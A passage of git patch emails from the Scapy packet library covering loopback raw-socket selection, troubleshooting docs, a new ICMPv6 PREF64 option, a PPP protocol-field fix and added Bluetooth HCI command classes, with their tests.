HCI_PHDR_Hdr From 0bc40c69352e850500890b633d326963da4e9a1a Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 26 Aug 2023 20:42:38 +0200 Subject: [PATCH 1078/1632] Use L3RawSocket(6) automatically on lo (#4099) --- doc/scapy/installation.rst | 35 -------------- doc/scapy/troubleshooting.rst | 91 ++++++++++++++++++++++++++++------- doc/scapy/usage.rst | 16 +----- scapy/config.py | 4 +- scapy/interfaces.py | 33 ++++++++----- scapy/sendrecv.py | 45 +++++++++++------ test/linux.uts | 11 +++-- test/regression.uts | 1 + 8 files changed, 136 insertions(+), 100 deletions(-) diff --git a/doc/scapy/installation.rst b/doc/scapy/installation.rst index afb687b1f51..695b0403a77 100644 --- a/doc/scapy/installation.rst +++ b/doc/scapy/installation.rst @@ -309,41 +309,6 @@ Screenshots :scale: 80 :align: center -Known bugs -^^^^^^^^^^ - -You may bump into the following bugs, which are platform-specific, if Scapy didn't manage work around them automatically: - - * You may not be able to capture WLAN traffic on Windows. Reasons are explained on the `Wireshark wiki `_ and in the `WinPcap FAQ `_. Try switching off promiscuous mode with ``conf.sniff_promisc=False``. - * Packets sometimes cannot be sent to localhost (or local IP addresses on your own host). - -Winpcap/Npcap conflicts -^^^^^^^^^^^^^^^^^^^^^^^ - -As ``Winpcap`` is becoming old, it's recommended to use ``Npcap`` instead. ``Npcap`` is part of the ``Nmap`` project. - -.. note:: - This does NOT apply for Windows XP, which isn't supported by ``Npcap``. - -1. If you get the message ``'Winpcap is installed over Npcap.'`` it means that you have installed both Winpcap and Npcap versions, which isn't recommended. - -You may first **uninstall winpcap from your Program Files**, then you will need to remove:: - - C:/Windows/System32/wpcap.dll - C:/Windows/System32/Packet.dll - -And if you are on an x64 machine:: - - C:/Windows/SysWOW64/wpcap.dll - C:/Windows/SysWOW64/Packet.dll - -To use ``Npcap`` instead, as those files are not removed by the ``Winpcap`` un-installer. - -2. If you get the message ``'The installed Windump version does not work with Npcap'`` it surely means that you have installed an old version of ``Windump``, made for ``Winpcap``. -Download the correct one on https://github.com/hsluoyz/WinDump/releases - -In some cases, it could also mean that you had installed ``Npcap`` and ``Winpcap``, and that ``Windump`` is using ``Winpcap``. Fully delete ``Winpcap`` using the above method to solve the problem. - Build the documentation offline =============================== diff --git a/doc/scapy/troubleshooting.rst b/doc/scapy/troubleshooting.rst index 3025e3c097d..4131ec280f6 100644 --- a/doc/scapy/troubleshooting.rst +++ b/doc/scapy/troubleshooting.rst @@ -8,21 +8,33 @@ FAQ I can't sniff/inject packets in monitor mode. --------------------------------------------- -The use monitor mode varies greatly depending on the platform. +The use monitor mode varies greatly depending on the platform, reasons are explained on the `Wireshark wiki `_: + + *Unfortunately, changing the 802.11 capture modes is very platform/network adapter/driver/libpcap dependent, and might not be possible at all (Windows is very limited here).* + +Here is some guidance on how to properly use monitor mode with Scapy: + +- **Using Libpcap (or Npcap)**: + ``libpcap`` must be called differently by Scapy in order for it to create the sockets in monitor mode. You will need to pass the ``monitor=True`` to any calls that open a socket (``send``, ``sniff``...) or to a Scapy socket that you create yourself (``conf.L2Socket``...) + + **On Windows**, you additionally need to turn on monitor mode on the WiFi card, use:: + + # Of course, conf.iface can be replaced by any interfaces accessed through conf.ifaces + >>> conf.iface.setmonitor(True) -- **Using Libpcap** - ``libpcap`` must be called differently by Scapy in order for it to create the sockets in monitor mode. You will need to pass the ``monitor=True`` to any calls that open a socket (``send``, ``sniff``...) or to a Scapy socket that you create yourself (``conf.L2Socket``...) - **Native Linux (with libpcap disabled):** - You should set the interface in monitor mode on your own. I personally like - to use iwconfig for that (replace ``monitor`` by ``managed`` to disable):: + You should set the interface in monitor mode on your own. The easiest way to do that is to use ``airmon-ng``:: + + $ sudo airmon-ng start wlan0 + + You can also use:: - $ sudo ifconfig IFACE down - $ sudo iwconfig IFACE mode monitor - $ sudo ifconfig IFACE up + $ iw dev wlan0 interface add mon0 type monitor + $ ifconfig mon0 up -**If you are using Npcap:** please note that Npcap ``npcap-0.9983`` broke the 802.11 util back in 2019. It has yet to be fixed (as of Npcap 0.9994) so in the meantime, use `npcap-0.9982.exe `_ + If you want to enable monitor mode manually, have a look at https://wiki.wireshark.org/CaptureSetup/WLAN#linux -.. note:: many adapters do not support monitor mode, especially on Windows, or may incorrectly report the headers. See `the Wireshark doc about this `_ +.. warning:: **If you are using Npcap:** please note that Npcap ``npcap-0.9983`` broke the 802.11 support until ``npcap-1.3.0``. Avoid using those versions. We make our best to make this work, if your adapter works with Wireshark for instance, but not with Scapy, feel free to report an issue. @@ -35,12 +47,14 @@ I can't ping 127.0.0.1 (or ::1). Scapy does not work with 127.0.0.1 (or ::1) on The loopback interface is a very special interface. Packets going through it are not really assembled and disassembled. The kernel routes the packet to its destination while it is still stored an internal structure. What you see with ```tcpdump -i lo``` is only a fake to make you think everything is normal. The kernel is not aware of what Scapy is doing behind his back, so what you see on the loopback interface is also a fake. Except this one did not come from a local structure. Thus the kernel will never receive it. -On Linux, in order to speak to local IPv4 applications, you need to build your packets one layer upper, using a PF_INET/SOCK_RAW socket instead of a PF_PACKET/SOCK_RAW (or its equivalent on other systems than Linux):: +.. note:: Starting from Scapy > **2.5.0**, Scapy will automatically use ``L3RawSocket`` when necessary when using L3-functions (sr-like) on the loopback interface, when libpcap is not in use. + +**On Linux**, in order to speak to local IPv4 applications, you need to build your packets one layer upper, using a PF_INET/SOCK_RAW socket instead of a PF_PACKET/SOCK_RAW (or its equivalent on other systems than Linux):: >>> conf.L3socket >>> conf.L3socket = L3RawSocket - >>> sr1(IP(dst) / ICMP()) + >>> sr1(IP() / ICMP()) > With IPv6, you can simply do:: @@ -50,11 +64,20 @@ With IPv6, you can simply do:: > # Layer 2 - >>> conf.iface = "lo" - >>> srp1(Ether() / IPv6() / ICMPv6EchoRequest()) + >>> srp1(Ether() / IPv6() / ICMPv6EchoRequest(), iface=conf.loopback_name) >> -On Windows, BSD, and macOS, you must deactivate the local firewall and set ````conf.iface``` to the loopback interface prior to using the following commands:: +.. warning:: + On Linux, libpcap does not support loopback IPv4 pings: + >>> conf.use_pcap = True + >>> sr1(IP() / ICMP()) + Begin emission: + Finished sending 1 packets. + ..................................... + + You can disable libpcap using ``conf.use_pcap = False`` or bypass it on layer 3 using ``conf.L3socket = L3RawSocket``. + +**On Windows, BSD, and macOS**, you must deactivate/configure the local firewall prior to using the following commands:: # Layer 3 >>> sr1(IP() / ICMP()) @@ -63,11 +86,45 @@ On Windows, BSD, and macOS, you must deactivate the local firewall and set ````c > # Layer 2 - >>> srp1(Loopback() / IP() / ICMP()) + >>> srp1(Loopback() / IP() / ICMP(), iface=conf.loopback_name) >> - >>> srp1(Loopback() / IPv6() / ICMPv6EchoRequest()) + >>> srp1(Loopback() / IPv6() / ICMPv6EchoRequest(), iface=conf.loopback_name) >> +Getting 'failed to set hardware filter to promiscuous mode' error +----------------------------------------------------------------- + +Disable promiscuous mode:: + + conf.sniff_promisc = False + +Scapy says there are 'Winpcap/Npcap conflicts' +---------------------------------------------- + +**On Windows**, as ``Winpcap`` is becoming old, it's recommended to use ``Npcap`` instead. ``Npcap`` is part of the ``Nmap`` project. + +.. note:: + This does NOT apply for Windows XP, which isn't supported by ``Npcap``. On XP, uninstall ``Npcap`` and keep ``Winpcap``. + +1. If you get the message ``'Winpcap is installed over Npcap.'`` it means that you have installed both Winpcap and Npcap versions, which isn't recommended. + +You may first **uninstall winpcap from your Program Files**, then you will need to remove some files that are not deleted by the ``Winpcap`` uninstaller:: + + C:/Windows/System32/wpcap.dll + C:/Windows/System32/Packet.dll + +And if you are on an x64 machine, additionally the 32-bit variants:: + + C:/Windows/SysWOW64/wpcap.dll + C:/Windows/SysWOW64/Packet.dll + +Once that is done, you'll be able to use ``Npcap`` properly. + +2. If you get the message ``'The installed Windump version does not work with Npcap'`` it means that you have probably installed an old version of ``Windump``, made for ``Winpcap``. +Download the one compatible with ``Npcap`` on https://github.com/hsluoyz/WinDump/releases + +In some cases, it could also mean that you had installed both ``Npcap`` and ``Winpcap``, and that the Npcap ``Windump`` is using ``Winpcap``. Fully delete ``Winpcap`` using the above method to solve the problem. + BPF filters do not work. I'm on a ppp link ------------------------------------------ diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 020ab493a6e..a06b5ba200d 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1213,21 +1213,9 @@ Wireless frame injection single: FakeAP, Dot11, wireless, WLAN .. note:: - See the TroubleShooting section for more information on the usage of Monitor mode among Scapy. + See the :doc:`TroubleShooting ` section for more information on the usage of Monitor mode among Scapy. -Provided that your wireless card and driver are correctly configured for frame injection - -:: - - $ iw dev wlan0 interface add mon0 type monitor - $ ifconfig mon0 up - -On Windows, if using Npcap, the equivalent would be to call:: - - >>> # Of course, conf.iface can be replaced by any interfaces accessed through conf.ifaces - ... conf.iface.setmonitor(True) - -you can have a kind of FakeAP:: +Provided that your wireless card and driver are correctly configured for frame injection, you can have a kind of FakeAP:: >>> sendp(RadioTap()/ Dot11(addr1="ff:ff:ff:ff:ff:ff", diff --git a/scapy/config.py b/scapy/config.py index 679f18e53ba..639d19e7556 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -747,10 +747,8 @@ class Conf(ConfClass): check_TCPerror_seqack = False verb = 2 #: level of verbosity, from 0 (almost mute) to 3 (verbose) prompt = Interceptor("prompt", ">>> ", _prompt_changer) - #: default mode for listening socket (to get answers if you + #: default mode for the promiscuous mode of a socket (to get answers if you #: spoof on a lan) - promisc = True - #: default mode for sniff() sniff_promisc = True # type: bool raw_layer = None # type: Type[Packet] raw_summary = False # type: Union[bool, Callable[[bytes], Any]] diff --git a/scapy/interfaces.py b/scapy/interfaces.py index 3bceeac0978..17985c4e900 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -12,7 +12,7 @@ from collections import defaultdict from scapy.config import conf -from scapy.consts import WINDOWS +from scapy.consts import WINDOWS, LINUX from scapy.utils import pretty_list from scapy.utils6 import in6_isvalid @@ -20,6 +20,7 @@ import scapy from scapy.compat import UserDict from typing import ( + cast, Any, DefaultDict, Dict, @@ -49,19 +50,27 @@ def reload(self): """Same than load() but for reloads. By default calls load""" return self.load() - def l2socket(self): - # type: () -> Type[scapy.supersocket.SuperSocket] + def _l2socket(self, dev): + # type: (NetworkInterface) -> Type[scapy.supersocket.SuperSocket] """Return L2 socket used by interfaces of this provider""" return conf.L2socket - def l2listen(self): - # type: () -> Type[scapy.supersocket.SuperSocket] + def _l2listen(self, dev): + # type: (NetworkInterface) -> Type[scapy.supersocket.SuperSocket] """Return L2listen socket used by interfaces of this provider""" return conf.L2listen - def l3socket(self): - # type: () -> Type[scapy.supersocket.SuperSocket] + def _l3socket(self, dev, ipv6): + # type: (NetworkInterface, bool) -> Type[scapy.supersocket.SuperSocket] """Return L3 socket used by interfaces of this provider""" + if LINUX and not self.libpcap and dev.name == conf.loopback_name: + # handle the loopback case. see troubleshooting.rst + if ipv6: + from scapy.layers.inet6 import L3RawSocket6 + return cast(Type['scapy.supersocket.SuperSocket'], L3RawSocket6) + else: + from scapy.supersocket import L3RawSocket + return L3RawSocket return conf.L3socket def _is_valid(self, dev): @@ -156,15 +165,15 @@ def is_valid(self): def l2socket(self): # type: () -> Type[scapy.supersocket.SuperSocket] - return self.provider.l2socket() + return self.provider._l2socket(self) def l2listen(self): # type: () -> Type[scapy.supersocket.SuperSocket] - return self.provider.l2listen() + return self.provider._l2listen(self) - def l3socket(self): - # type: () -> Type[scapy.supersocket.SuperSocket] - return self.provider.l3socket() + def l3socket(self, ipv6): + # type: (bool) -> Type[scapy.supersocket.SuperSocket] + return self.provider._l3socket(self, ipv6) def __repr__(self): # type: () -> str diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 8628a000e96..85136ab18a5 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -11,6 +11,7 @@ from threading import Thread, Event import os import re +import socket import subprocess import time @@ -24,6 +25,7 @@ NetworkInterface, ) from scapy.packet import Packet +from scapy.pton_ntop import inet_pton from scapy.utils import get_temp_file, tcpdump, wrpcap, \ ContextManagerSubprocess, PcapReader, EDecimal from scapy.plist import ( @@ -439,10 +441,10 @@ def send(x, # type: _PacketIterable :param monitor: (not on linux) send in monitor mode :returns: None """ - iface = _interface_selection(iface, x) + iface, ipv6 = _interface_selection(iface, x) return _send( x, - lambda iface: iface.l3socket(), + lambda iface: iface.l3socket(ipv6), iface=iface, **kargs ) @@ -616,19 +618,26 @@ def _parse_tcpreplay_result(stdout_b, stderr_b, argv): def _interface_selection(iface, # type: Optional[_GlobInterfaceType] packet # type: _PacketIterable ): - # type: (...) -> _GlobInterfaceType + # type: (...) -> Tuple[NetworkInterface, bool] """ Select the network interface according to the layer 3 destination """ - + _iff, src, _ = next(packet.__iter__()).route() + ipv6 = False + if src: + try: + inet_pton(socket.AF_INET6, src) + ipv6 = True + except OSError: + pass if iface is None: try: - iff = next(packet.__iter__()).route()[0] + iff = resolve_iface(_iff or conf.iface) except AttributeError: iff = None - return iff or conf.iface + return iff or conf.iface, ipv6 - return iface + return resolve_iface(iface), ipv6 @conf.commands.register @@ -644,9 +653,11 @@ def sr(x, # type: _PacketIterable """ Send and receive packets at layer 3 """ - iface = _interface_selection(iface, x) - s = conf.L3socket(promisc=promisc, filter=filter, - iface=iface, nofilter=nofilter) + iface, ipv6 = _interface_selection(iface, x) + s = iface.l3socket(ipv6)( + promisc=promisc, filter=filter, + iface=iface, nofilter=nofilter, + ) result = sndrcv(s, x, *args, **kargs) s.close() return result @@ -887,8 +898,11 @@ def srflood(x, # type: _PacketIterable :param filter: provide a BPF filter :param iface: listen answers only on the given interface """ - iface = resolve_iface(iface or conf.iface) - s = iface.l3socket()(promisc=promisc, filter=filter, iface=iface, nofilter=nofilter) # noqa: E501 + iface, ipv6 = _interface_selection(iface, x) + s = iface.l3socket(ipv6)( + promisc=promisc, filter=filter, + iface=iface, nofilter=nofilter, + ) r = sndrcvflood(s, x, *args, **kargs) s.close() return r @@ -912,8 +926,11 @@ def sr1flood(x, # type: _PacketIterable :param filter: provide a BPF filter :param iface: listen answers only on the given interface """ - iface = resolve_iface(iface or conf.iface) - s = iface.l3socket()(promisc=promisc, filter=filter, nofilter=nofilter, iface=iface) # noqa: E501 + iface, ipv6 = _interface_selection(iface, x) + s = iface.l3socket(ipv6)( + promisc=promisc, filter=filter, + nofilter=nofilter, iface=iface, + ) ans, _ = sndrcvflood(s, x, *args, **kargs) s.close() if len(ans) > 0: diff --git a/test/linux.uts b/test/linux.uts index b6a6fc5712c..48e27921cbd 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -11,12 +11,9 @@ = L3RawSocket ~ netaccess IP TCP linux needs_root -old_l3socket = conf.L3socket -conf.L3socket = L3RawSocket with no_debug_dissector(): x = sr1(IP(dst="www.google.com")/TCP(sport=RandShort(), dport=80, flags="S"),timeout=3) -conf.L3socket = old_l3socket x assert x[IP].ottl() in [32, 64, 128, 255] assert 0 <= x[IP].hops() <= 126 @@ -309,16 +306,20 @@ assert test_L3PacketSocket_sendto_python3() import os from scapy.sendrecv import _interface_selection -assert _interface_selection(None, IP(dst="8.8.8.8")/UDP()) == conf.iface +assert _interface_selection(None, IP(dst="8.8.8.8")/UDP()) == (conf.iface, False) exit_status = os.system("ip link add name scapy0 type dummy") exit_status = os.system("ip addr add 192.0.2.1/24 dev scapy0") +exit_status = os.system("ip addr add fc00::/24 dev scapy0") exit_status = os.system("ip link set scapy0 up") conf.ifaces.reload() conf.route.resync() -assert _interface_selection(None, IP(dst="192.0.2.42")/UDP()) == "scapy0" +conf.route6.resync() +assert _interface_selection(None, IP(dst="192.0.2.42")/UDP()) == ("scapy0", False) +assert _interface_selection(None, IPv6(dst="fc00::ae0d")/UDP()) == ("scapy0", True) exit_status = os.system("ip link del name dev scapy0") conf.ifaces.reload() conf.route.resync() +conf.route6.resync() = Test 802.Q sniffing ~ linux needs_root veth diff --git a/test/regression.uts b/test/regression.uts index 7f43b7fc22b..3f36ec9c47a 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1518,6 +1518,7 @@ retry_test(_test) = Latency check: localhost ICMP ~ netaccess needs_root linux latency +# Note: still needs to enforce L3RawSocket as this won't work otherwise with libpcap sock = conf.L3socket conf.L3socket = L3RawSocket From e45499000cc74f3c40ca2e1ba31c28ee6b29c106 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Tue, 29 Aug 2023 11:28:57 +0300 Subject: [PATCH 1079/1632] [INET6] add the PREF64 ND option (#4105) --- scapy/layers/inet6.py | 23 +++++++++++++++++++++++ test/scapy/layers/inet6.uts | 26 ++++++++++++++++++++++++++ 2 files changed, 49 insertions(+) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 2619c828808..0dbb19e0f14 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1720,6 +1720,7 @@ def extract_padding(self, s): 26: "ICMPv6NDOptEFA", 31: "ICMPv6NDOptDNSSL", 37: "ICMPv6NDOptCaptivePortal", + 38: "ICMPv6NDOptPREF64", } icmp6ndraprefs = {0: "Medium (default)", @@ -2087,6 +2088,28 @@ class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910 def mysummary(self): return self.sprintf("%name% %URI%") + +class _PREF64(IP6Field): + def addfield(self, pkt, s, val): + return s + self.i2m(pkt, val)[:12] + + def getfield(self, pkt, s): + return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4) + + +class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781 + name = "ICMPv6 Neighbor Discovery Option - PREF64 Option" + fields_desc = [ByteField("type", 38), + ByteField("len", 2), + BitField("scaledlifetime", 0, 13), + BitEnumField("plc", 0, 3, + ["/96", "/64", "/56", "/48", "/40", "/32"]), + _PREF64("prefix", "::")] + + def mysummary(self): + plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]" + return self.sprintf("%name% %prefix%") + plc + # End of ICMPv6 Neighbor Discovery Options. diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index b9f78a0b9ce..3c06be0c117 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -1250,6 +1250,32 @@ a=ICMPv6NDOptEFA(b'\x1a\x01\x00\x00\x00\x00\x00\x00') a.type==26 and a.len==1 and a.res == 0 +############ +############ ++ ICMPv6NDOptPREF64 Class Test + += ICMPv6NDOptPREF64 - Basic Instantiation +raw(ICMPv6NDOptPREF64()) == b'\x26\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptPREF64 - Basic Dissection +p = ICMPv6NDOptPREF64(b'\x26\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert p.type == 38 and p.len == 2 and p.scaledlifetime == 0 and p.plc == 0 and p.prefix == '::' + += ICMPv6NDOptPREF64 - Instantiation/Dissection with specific values +p = ICMPv6NDOptPREF64(scaledlifetime=225, plc='/64', prefix='2003:da8:1::') +assert raw(p) == b'\x26\x02\x07\x09\x20\x03\x0d\xa8\x00\x01\x00\x00\x00\x00\x00\x00' + +p = ICMPv6NDOptPREF64(raw(p)) +assert p.type == 38 and p.len == 2 and p.scaledlifetime == 225 and p.plc == 1 and p.prefix == '2003:da8:1::' + +p = ICMPv6NDOptPREF64(raw(p) + b'\x00\x00\x00\x00') +assert Raw in p and len(p[Raw]) == 4 + += ICMPv6NDOptPREF64 - Summary Output +ICMPv6NDOptPREF64(prefix='12:34:56::', plc='/32').mysummary() == "ICMPv6 Neighbor Discovery Option - PREF64 Option 12:34:56::/32" +ICMPv6NDOptPREF64(prefix='12:34:56::', plc=6).mysummary() == "ICMPv6 Neighbor Discovery Option - PREF64 Option 12:34:56::[invalid PLC(6)]" + + ############ ############ + Test Node Information Query - ICMPv6NIQueryNOOP From 3e6900776698cd5472c5405294414d5b672a3f18 Mon Sep 17 00:00:00 2001 From: Olivier Matz Date: Tue, 29 Aug 2023 10:54:10 +0200 Subject: [PATCH 1080/1632] PPP: fix default size of protocol field (#4106) In commit 2f5d9bd4dab8 ("PPP: protocol field can be limited to one byte"), a new class PPP_ was added to manage parsing and generation a PPP header with a one byte PPP protocol field. This was later reworked by commit 834309f91c1d ("Small doc cleanups"), which removed the PPP_ class, and changed the default behavior of the PPP class to generate a one byte protocol field by default, when its value was lower than 0x100. The RFC states that "by default, all implementations MUST transmit packets with two octet PPP Protocol fields". A header with a one byte protocol field is issued by implementations when the compression is negociated. This patch reverts to the original behavior, which is to generate a two bytes protocol field by default, but make it possible to explicitly generate a one byte protocol by passing the value as bytes(). The PPP class is still able to parse either a one or two bytes protocol. Link: https://www.rfc-editor.org/rfc/rfc1661.html#section-6.5 Fixes #3913 --- scapy/layers/ppp.py | 24 +++++++++++++++++++----- test/scapy/layers/ppp.uts | 16 ++++++++++++++-- 2 files changed, 33 insertions(+), 7 deletions(-) diff --git a/scapy/layers/ppp.py b/scapy/layers/ppp.py index b5cd42b46ec..e0f4c593d0c 100644 --- a/scapy/layers/ppp.py +++ b/scapy/layers/ppp.py @@ -292,6 +292,14 @@ class _PPPProtoField(EnumField): See RFC 1661 section 2 + + The generated proto field is two bytes when not specified, or when specified + as an integer or a string: + PPP() + PPP(proto=0x21) + PPP(proto="Internet Protocol version 4") + To explicitly forge a one byte proto field, use the bytes representation: + PPP(proto=b'\x21') """ def getfield(self, pkt, s): if ord(s[:1]) & 0x01: @@ -304,12 +312,18 @@ def getfield(self, pkt, s): return super(_PPPProtoField, self).getfield(pkt, s) def addfield(self, pkt, s, val): - if val < 0x100: - self.fmt = "!B" - self.sz = 1 + if isinstance(val, bytes): + if len(val) == 1: + fmt, sz = "!B", 1 + elif len(val) == 2: + fmt, sz = "!H", 2 + else: + raise TypeError('Invalid length for PPP proto') + val = struct.Struct(fmt).unpack(val)[0] else: - self.fmt = "!H" - self.sz = 2 + fmt, sz = "!H", 2 + self.fmt = fmt + self.sz = sz self.struct = struct.Struct(self.fmt) return super(_PPPProtoField, self).addfield(pkt, s, val) diff --git a/test/scapy/layers/ppp.uts b/test/scapy/layers/ppp.uts index 42bd818a313..1961580fa6e 100644 --- a/test/scapy/layers/ppp.uts +++ b/test/scapy/layers/ppp.uts @@ -112,12 +112,24 @@ assert raw(p) == raw(q) assert q[PPP_ECP_Option].data == b"ABCDEFG" -= PPP with only one byte for protocol += PPP IP check that default protocol length is 2 bytes +~ ppp ip + +p = PPP()/IP() +p +r = raw(p) +r +assert r.startswith(b'\x00\x21') +assert len(r) == 22 + + += PPP check parsing with only one byte for protocol ~ ppp -assert len(raw(PPP() / IP())) == 21 +assert len(raw(PPP(proto=b'\x21') / IP())) == 21 p = PPP(b'!E\x00\x00<\x00\x00@\x008\x06\xa5\xce\x85wP)\xc0\xa8Va\x01\xbbd\x8a\xe2}r\xb8O\x95\xb5\x84\xa0\x12q \xc8\x08\x00\x00\x02\x04\x02\x18\x04\x02\x08\nQ\xdf\xd6\xb0\x00\x07LH\x01\x03\x03\x07Ao') assert IP in p assert TCP in p +assert PPP(b"\x00\x21" + raw(IP())) == PPP(b"\x21" + raw(IP())) From c57c02beb60538f23c3355cd8e207ed4f44462b6 Mon Sep 17 00:00:00 2001 From: Hui Peng Date: Thu, 31 Aug 2023 13:30:19 -0700 Subject: [PATCH 1081/1632] Adding a few more Bluetooth HCI Commands (#4103) * Document the section of definition of some HCI commands * Add more Bluetooth HCI Commands [1] * Add more Bluetooth HCI commands [2] * Fix the definition of HCI_Connection_Complete - fix the name - add missing fields - update test * Add HCI_Inquiry_Complete event --- scapy/layers/bluetooth.py | 349 +++++++++++++++++++++++++++++++- test/scapy/layers/bluetooth.uts | 8 +- 2 files changed, 349 insertions(+), 8 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index cca1d5a9086..3b82842f6bb 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -34,6 +34,7 @@ IntField, LEShortEnumField, LEShortField, + LEIntField, LenField, MultipleTypeField, NBytesField, @@ -923,6 +924,12 @@ def post_build(self, p, pay): class HCI_Cmd_Inquiry(Packet): + """ + + 7.1.1 Inquiry command + + """ + name = "HCI_Inquiry" fields_desc = [XLE3BytesField("lap", 0x9E8B33), ByteField("inquiry_length", 0), @@ -930,10 +937,22 @@ class HCI_Cmd_Inquiry(Packet): class HCI_Cmd_Inquiry_Cancel(Packet): + """ + + 7.1.2 Inquiry Cancel command + + """ + name = "HCI_Inquiry_Cancel" class HCI_Cmd_Periodic_Inquiry_Mode(Packet): + """ + + 7.1.3 Periodic Inquiry Mode command + + """ + name = "HCI_Periodic_Inquiry_Mode" fields_desc = [LEShortField("max_period_length", 0x0003), LEShortField("min_period_length", 0x0002), @@ -943,10 +962,22 @@ class HCI_Cmd_Periodic_Inquiry_Mode(Packet): class HCI_Cmd_Exit_Peiodic_Inquiry_Mode(Packet): + """ + + 7.1.4 Exit Periodic Inquiry Mode command + + """ + name = "HCI_Exit_Periodic_Inquiry_Mode" class HCI_Cmd_Create_Connection(Packet): + """ + + 7.1.5 Create Connection command + + """ + name = "HCI_Create_Connection" fields_desc = [LEMACField("bd_addr", None), LEShortField("packet_type", 0xcc18), @@ -957,28 +988,162 @@ class HCI_Cmd_Create_Connection(Packet): class HCI_Cmd_Disconnect(Packet): + """ + + 7.1.6 Disconnect command + + """ + name = "HCI_Disconnect" fields_desc = [XLEShortField("handle", 0), ByteField("reason", 0x13), ] +class HCI_Cmd_Create_Connection_Cancel(Packet): + """ + + 7.1.7 Create Connection Cancel command + + """ + + name = "HCI_Create_Connection_Cancel" + fields_desc = [LEMACField("bd_addr", None), ] + + +class HCI_Cmd_Accept_Connection_Request(Packet): + """ + + 7.1.8 Accept Connection Request command + + """ + + name = "HCI_Accept_Connection_Request" + fields_desc = [LEMACField("bd_addr", None), + ByteField("role", 0x1), ] + + +class HCI_Cmd_Reject_Connection_Response(Packet): + """ + + 7.1.9 Reject Connection Request command + + """ + name = "HCI_Reject_Connection_Response" + fields_desc = [LEMACField("bd_addr", None), + ByteField("reason", 0x1), ] + + class HCI_Cmd_Link_Key_Request_Reply(Packet): + """ + + 7.1.10 Link Key Request Reply command + + """ + name = "HCI_Link_Key_Request_Reply" fields_desc = [LEMACField("bd_addr", None), NBytesField("link_key", None, 16), ] +class HCI_Cmd_Link_Key_Request_Negative_Reply(Packet): + """ + + 7.1.11 Link Key Request Negative Reply command + + """ + + name = "HCI_Link_Key_Request_Negative_Reply" + fields_desc = [LEMACField("bd_addr", None), ] + + +class HCI_Cmd_PIN_Code_Request_Reply(Packet): + """ + + 7.1.12 PIN Code Request Reply command + + """ + + name = "HCI_PIN_Code_Request_Reply" + fields_desc = [LEMACField("bd_addr", None), + ByteField("pin_code_length", 7), + NBytesField("pin_code", b"\x00" * 16, sz=16), ] + + +class HCI_Cmd_PIN_Code_Request_Negative_Reply(Packet): + """ + + 7.1.13 PIN Code Request Negative Reply command + + """ + + name = "HCI_PIN_Code_Request_Negative_Reply" + fields_desc = [LEMACField("bd_addr", None), ] + + +class HCI_Cmd_Change_Connection_Packet_Type(Packet): + """ + + 7.1.14 Change Connection Packet Type command + + """ + + name = "HCI_Cmd_Change_Connection_Packet_Type" + fields_desc = [XLEShortField("connection_handle", None), + LEShortField("packet_type", 0), ] + + class HCI_Cmd_Authentication_Requested(Packet): + """ + + 7.1.15 Authentication Requested command + + """ + name = "HCI_Authentication_Requested" fields_desc = [LEShortField("handle", 0)] class HCI_Cmd_Set_Connection_Encryption(Packet): + """ + + 7.1.16 Set Connection Encryption command + + """ + name = "HCI_Set_Connection_Encryption" fields_desc = [LEShortField("handle", 0), ByteField("encryption_enable", 0)] +class HCI_Cmd_Change_Connection_Link_Key(Packet): + """ + + 7.1.17 Change Connection Link Key command + + """ + + name = "HCI_Change_Connection_Link_Key" + fields_desc = [LEShortField("handle", 0), ] + + +class HCI_Cmd_Link_Key_Selection(Packet): + """ + + 7.1.18 Change Connection Link Key command + + """ + + name = "HCI_Cmd_Link_Key_Selection" + fields_desc = [ByteEnumField("handle", 0, {0: "Use semi-permanent Link Keys", + 1: "Use Temporary Link Key", }), ] + + class HCI_Cmd_Remote_Name_Request(Packet): + """ + + 7.1.19 Remote Name Request command + + """ + name = "HCI_Remote_Name_Request" fields_desc = [LEMACField("bd_addr", None), ByteField("page_scan_repetition_mode", 0x02), @@ -986,7 +1151,137 @@ class HCI_Cmd_Remote_Name_Request(Packet): LEShortField("clock_offset", 0x0), ] +class HCI_Cmd_Remote_Name_Request_Cancel(Packet): + """ + + 7.1.20 Remote Name Request Cancel command + + """ + + name = "HCI_Remote_Name_Request_Cancel" + fields_desc = [LEMACField("bd_addr", None), ] + + +class HCI_Cmd_Read_Remote_Supported_Features(Packet): + """ + + 7.1.21 Read Remote Supported Features command + + """ + + name = "HCI_Read_Remote_Supported_Features" + fields_desc = [LEShortField("connection_handle", None), ] + + +class HCI_Cmd_Read_Remote_Extended_Features(Packet): + """ + + 7.1.22 Read Remote Extended Features command + + """ + + name = "HCI_Read_Remote_Supported_Features" + fields_desc = [LEShortField("connection_handle", None), + ByteField("page_number", None), ] + + +class HCI_Cmd_IO_Capability_Request_Reply(Packet): + """ + + 7.1.29 IO Capability Request Reply command + + """ + + name = "HCI_Read_Remote_Supported_Features" + fields_desc = [LEMACField("bd_addr", None), + ByteEnumField("io_capability", None, {0x00: "DisplayOnly", + 0x01: "DisplayYesNo", + 0x02: "KeyboardOnly", + 0x03: 